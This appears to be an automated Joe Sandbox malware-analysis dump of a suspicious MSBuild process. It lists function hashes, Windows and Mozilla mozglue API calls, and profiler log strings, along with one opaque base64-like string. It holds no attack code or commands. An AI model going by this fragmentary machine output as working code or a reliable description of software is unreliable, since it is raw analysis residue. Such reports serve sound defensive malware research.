                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                                                                      • API String ID: 1340022502-4194431170
                                                                                                                                                                                                                      • Opcode ID: ad18604a24ed660fef39a2951fb73ef091880b82159920e9fc9b5068f11fe5b4
                                                                                                                                                                                                                      • Instruction ID: 3d9adf6a207b453c785794585af552914d125920d2085aa281f087c9ddbe4f89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad18604a24ed660fef39a2951fb73ef091880b82159920e9fc9b5068f11fe5b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6381E371B041008BDB20DF6CCA8875A77B5AFC231CF240A3DD926A7B91D731E955CB9A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F760), ref: 6C8919BD
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C8919E5
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891A27
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C891A41
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C891A4F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891A92
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C891AAC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C891ABA
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6C891C69
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891C8F
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C891C9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C891CAE
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F760), ref: 6C891D52
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891DA5
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891DFB
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891E49
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C891E68
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C891E9B
                                                                                                                                                                                                                        • Part of subcall function 6C892070: LoadLibraryW.KERNEL32(combase.dll,6C891C5F), ref: 6C8920AE
                                                                                                                                                                                                                        • Part of subcall function 6C892070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C8920CD
                                                                                                                                                                                                                        • Part of subcall function 6C892070: __Init_thread_footer.LIBCMT ref: 6C8920E1
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C891F15
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F46
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F52
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F59
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C891F60
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C891F6D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 290179723-2746444292
                                                                                                                                                                                                                      • Opcode ID: f745a1988a9aa42fe18c29e6aabe2e63351f97b8b527714ae0e764db4237ea54
                                                                                                                                                                                                                      • Instruction ID: 64d840141a9dc22d3e6ea46604993ee9c1389158510463eb2a3fe40351327e44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f745a1988a9aa42fe18c29e6aabe2e63351f97b8b527714ae0e764db4237ea54
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F18F71A08215AFEB209F69CD88B9AB7B8FF49704F1145ADE905E7640D774DE80CFA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C894730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8944B2,6C90E21C,6C90F7F8), ref: 6C89473E
                                                                                                                                                                                                                        • Part of subcall function 6C894730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C89474A
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8944BA
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8944D2
                                                                                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C90F80C,6C88F240,?,?), ref: 6C89451A
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C89455C
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6C894592
                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6C90F770), ref: 6C8945A2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6C8945AA
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6C8945BB
                                                                                                                                                                                                                      • InitOnceExecuteOnce.KERNEL32(6C90F818,6C88F240,?,?), ref: 6C894612
                                                                                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C894636
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6C894644
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C89466D
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89469F
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946AB
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946B2
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946B9
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8946C0
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8946CD
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C8946F1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C8946FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                      • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                      • Opcode ID: d6e0e1eab0a288874f87789fa93f2892b7ef8ab99ae137e92c17b14840796140
                                                                                                                                                                                                                      • Instruction ID: 4f838584e3c6f29dd903fe4c283867b42b9bf38416e5f7ba236802a95a606e14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e0e1eab0a288874f87789fa93f2892b7ef8ab99ae137e92c17b14840796140
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F76114B1708348AFEB219F68CD49B957BB8FBC670CF24899CE9149B641D7708A44CF91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C8CB9F1,?), ref: 6C8C7107
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C8CDCF5), ref: 6C8CE92D
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEA4F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEA5C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEA80
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEA8A
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C8CDCF5), ref: 6C8CEA92
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEB11
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEB1E
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C8CEB3C
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEB5B
                                                                                                                                                                                                                        • Part of subcall function 6C8C5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8CEB71), ref: 6C8C57AB
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEBA4
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C8CEBAC
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEBC1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000), ref: 6C8CEBCE
                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C8CEBE5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,00000000), ref: 6C8CEC37
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CEC46
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CEC55
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CEC5C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C8CEA9B
                                                                                                                                                                                                                      • [I %d/%d] profiler_start, xrefs: 6C8CEBB4
                                                                                                                                                                                                                      • xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO, xrefs: 6C8CEADC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                                                                                                                                                      • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start$xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO
                                                                                                                                                                                                                      • API String ID: 1341148965-1402726850
                                                                                                                                                                                                                      • Opcode ID: e930d8ebb1a006e857ad97b9fa8b703ab74abe3092eb56fed242e565787c5357
                                                                                                                                                                                                                      • Instruction ID: 529312a2c6d91d9e83ee566ff54f4fbe8e76359115e891c57bcccb659a13c8c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e930d8ebb1a006e857ad97b9fa8b703ab74abe3092eb56fed242e565787c5357
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEA123317046049FDB209F28C989BAA77B5FF86318F20493DED1997B41DB70E905CBA6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF70E
                                                                                                                                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C8CF8F9
                                                                                                                                                                                                                        • Part of subcall function 6C896390: GetCurrentThreadId.KERNEL32 ref: 6C8963D0
                                                                                                                                                                                                                        • Part of subcall function 6C896390: AcquireSRWLockExclusive.KERNEL32 ref: 6C8963DF
                                                                                                                                                                                                                        • Part of subcall function 6C896390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C89640E
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF93A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF98A
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF990
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF994
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF716
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                        • Part of subcall function 6C88B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C88B5E0
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF739
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF746
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF793
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C90385B,00000002,?,?,?,?,?), ref: 6C8CF829
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,00000000,?), ref: 6C8CF84C
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C8CF866
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CFA0C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C895E8C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895E9D
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThreadId.KERNEL32 ref: 6C895EAB
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThreadId.KERNEL32 ref: 6C895EB8
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895ECF
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C895F27
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C895F47
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentProcess.KERNEL32 ref: 6C895F53
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentThread.KERNEL32 ref: 6C895F5C
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: GetCurrentProcess.KERNEL32 ref: 6C895F66
                                                                                                                                                                                                                        • Part of subcall function 6C895E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C895F7E
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CF9C5
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8CF9DA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_register_thread(%s), xrefs: 6C8CF71F
                                                                                                                                                                                                                      • " attempted to re-register as ", xrefs: 6C8CF858
                                                                                                                                                                                                                      • Thread , xrefs: 6C8CF789
                                                                                                                                                                                                                      • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C8CF9A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                      • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                      • API String ID: 882766088-1834255612
                                                                                                                                                                                                                      • Opcode ID: 7d859c85a76f7f25701bda592d1eca208aebe216ed18956deeeb53b3e269e431
                                                                                                                                                                                                                      • Instruction ID: bdee0c47411c9725b9978c9fc0f1615d945e8f14a66becdeb230a5a9c26f7c3a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d859c85a76f7f25701bda592d1eca208aebe216ed18956deeeb53b3e269e431
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B18103717047009FEB209F68CA40AAAB7B5FFD5308F50496DE84997B51EB30E949CB93
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C894196
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C8941F1
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894223
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C89422A
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894231
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894238
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C894245
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C894263
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C89427A
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C894299
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C8942C4
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8942F6
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894302
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894309
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894310
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C894317
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C894324
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                                                                                                                                                      • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEE60
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEE6D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEE92
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CEEA5
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CEEB4
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CEEBB
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEEC7
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CEECF
